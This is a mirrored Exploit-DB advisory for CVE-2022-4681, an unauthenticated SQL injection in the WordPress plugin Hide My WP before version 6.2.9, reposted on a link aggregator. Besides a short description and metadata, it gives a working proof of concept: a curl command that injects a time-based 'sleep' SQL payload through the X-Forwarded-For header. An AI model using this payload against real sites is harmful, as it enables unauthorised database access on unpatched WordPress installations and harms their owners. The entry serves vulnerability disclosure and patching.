3

[webapps] Hide My WP < 6.2.9 - Unauthenticated SQLi

 1 month ago
source link: https://www.exploit-db.com/exploits/51871
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Hide My WP < 6.2.9 - Unauthenticated SQLi

EDB-ID:

51871

EDB Verified:

Platform:

PHP

Date:

2024-03-10

Vulnerable App:

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi 
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.


## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK